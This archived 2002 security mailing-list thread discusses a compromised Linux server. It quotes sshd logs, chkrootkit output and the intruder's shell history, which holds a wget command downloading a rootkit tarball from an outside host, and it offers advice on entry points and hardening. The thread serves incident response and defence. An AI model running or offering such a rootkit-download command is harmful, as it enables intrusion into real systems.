RE: possible ssh hack

From: Alvin Oga (alvin.secat_private-Consulting.com)
Date: Wed Sep 11 2002 - 21:38:26 PDT

  • Next message: Raúl Eduardo Millán Villalaz: "strange output from chkrootkit"

    hi ya ver
    
    On Wed, 11 Sep 2002, Ver Allan Sumabat wrote:
    
    > we used linux 2.4.7-10. we only opened ports 21 (ftp),
    > 22 (ssh), and 443 (https). 
    > 
    > 21 - wu-ftpd-2.6.1-20
    > 22 - openssh-3.1
    > 443 - tomcat-3.2.4
    
    what does nmap say is also open ports to the outside
    and to the inside your corp lan ??
     
    > 1. this is the content of /home/war's .bash_history:
    > 
    > wget
    > wget http://mrunix.free.fr/roy/w00tkit.tgz
    > logout
    
    game over... they are already in your server ...
    
    	- they probably got in thru wu-ftpd and/or openssh
    	( check the respective websites for the current
    	( versions you should have been running
    
    - you should NOT have been running 2.4.7-10 kernels...
    	you should always compile your own kernel
    	and apply your own kernel hardening apps
    
    they were trying to get more rootkits installed ( wootkit )
    
     
    > 2. he was trying to send a mail to himself regarding
    > the system's resources:
    > 
    > The original message was received at Thu, 5 Sep 2002
    > 22:21:37 +0800
    > from root@localhost
    > 
    >    ----- The following addresses had permanent fatal
    > errors -----
    > roi_blablaat_private
    >     (reason: 501 5.1.8 Sender domain must exist)
    
    seems really really odd that the [h/cr]acker would 
    send themself an email to a domain that does nto exists
    or to reject it... must be another hacked box they
    are playing with ??
    
    - more server hardening/tightening stuff
    	http://www.Linux-Sec.net
    
    c ya
    alvin
    
    > 
    >    ----- Transcript of session follows -----
    > ... while talking to rmail.walla.co.il.:
    > >>> MAIL From:<rootat_private> SIZE=2283
    > <<< 501 5.1.8 Sender domain must exist
    > 501 5.6.0 Data format error
    > 
    > 3. walla.co.il is in israel
    > 
    > 4. tracing 212.179.207.211 gives israel also.
    > 
    > i have moved the files to another machine and
    > reinstalled the server 'cause we need to put it up and
    > running asap. do u think the exploit was done thru
    > ftp? can u help me replicate it? i was looking for
    > procedures or scripts in ssh/ftp exploits so that i
    > can try to attack our server but i can not find any.
    > 
    > --- Loki <lokiat_private> wrote:
    > > What version of SSHD were you running, check
    > > commonly exploited
    > > services.
    > > 
    > > 1. SSHD (crc32)
    > > 2. FTPD 
    > > 3. Apache (chunking)
    > > 
    > > Get back to us with the versions you were running of
    > > SSH, FTP, and
    > > Apache and we can help you out. How hardened was the
    > > OS? Did you turn
    > > off all RPC services, etc. We need more info.
    > > 
    > > Eric/Loki
    > > Internet Warfare and Intelligence
    > > Fate Research Labs
    > > www.fatelabs.com
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > 
    > > -----Original Message-----
    > > From: Ver Allan Sumabat [mailto:ver_allanat_private]
    > > 
    > > Sent: Tuesday, September 10, 2002 6:08 AM
    > > To: incidentsat_private
    > > Subject: possible ssh hack
    > > 
    > > 
    > > Hi,
    > > 
    > > We have just recently been hacked. I have no idea
    > > how
    > > he came in. Here are my preliminary investigations:
    > > 
    > > 1. He was able to add a user without logging in.
    > > 
    > > **Unmatched Entries**
    > > Sep  5 10:39:33 srv1 sshd[20514]: Could not reverse
    > > map address 10.13.41.4.
    > > Sep  5 10:39:35 srv1 sshd[20514]: Accepted password
    > > for root from 10.13.41.4
    > > port 4207
    > > Sep  5 17:30:36 srv1 sshd[23299]: Could not reverse
    > > map address 10.13.41.4.
    > > Sep  5 17:30:41 srv1 sshd[23299]: Accepted password
    > > for root from 10.13.41.4
    > > port 2491
    > > Sep  5 22:16:59 srv1 useradd[23532]: new group:
    > > name=war, gid=502
    > > Sep  5 22:16:59 srv1 useradd[23532]: new user:
    > > name=war, uid=502, gid=502,
    > > home=/home/war, shell=/bin/bash
    > > Sep  5 22:17:31 srv1 sshd[23534]: Accepted password
    > > for war from
    > > 212.179.207.211 port 2746
    > > Sep  5 22:19:17 srv1 sshd[23580]: fatal: Read from
    > > socket failed: Connection
    > > reset by peer
    > > Sep  5 22:21:48 srv1 sshd[928]: Received SIGHUP;
    > > restarting.
    > > 
    > > 
    > > 2. He installed a tarball w00tkit.tgz in /home/war
    > > 
    > > 3. After running chkrootkit, the significant lines
    > > are:
    > > 
    > > ...
    > > Checking `ifconfig'... INFECTED
    > > ...
    > > Searching for Showtee... Warning: Possible Showtee
    > > Rootkit installed
    > > ...
    > > Checking `lkm'... You have     1 process hidden for
    > > ps
    > > command
    > > Warning: Possible LKM Trojan installed
    > > 
    > > 4. ssh won't run anymore
    > > 
    > > Can anyone help me on how the intrusion was done?
    > > 
    > > Thanks.
    > > 
    > > Regards,
    > > 
    > > Allan
    > > 
    > > __________________________________________________
    > > Yahoo! - We Remember
    > > 9-11: A tribute to the more than 3,000 lives lost
    > > http://dir.remember.yahoo.com/tribute
    > > 
    > >
    > ------------------------------------------------------------------------
    > > ----
    > > This list is provided by the SecurityFocus ARIS
    > > analyzer service. For
    > > more information on this free incident handling,
    > > management 
    > > and tracking system please see:
    > > http://aris.securityfocus.com
    > > 
    > > 
    > >
    > ----------------------------------------------------------------------------
    > > This list is provided by the SecurityFocus ARIS
    > > analyzer service.
    > > For more information on this free incident handling,
    > > management 
    > > and tracking system please see:
    > > http://aris.securityfocus.com
    > > 
    > 
    > __________________________________________________
    > Do you Yahoo!?
    > Yahoo! News - Today's headlines
    > http://news.yahoo.com
    > 
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management 
    > and tracking system please see: http://aris.securityfocus.com
    > 
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Thu Sep 12 2002 - 23:06:00 PDT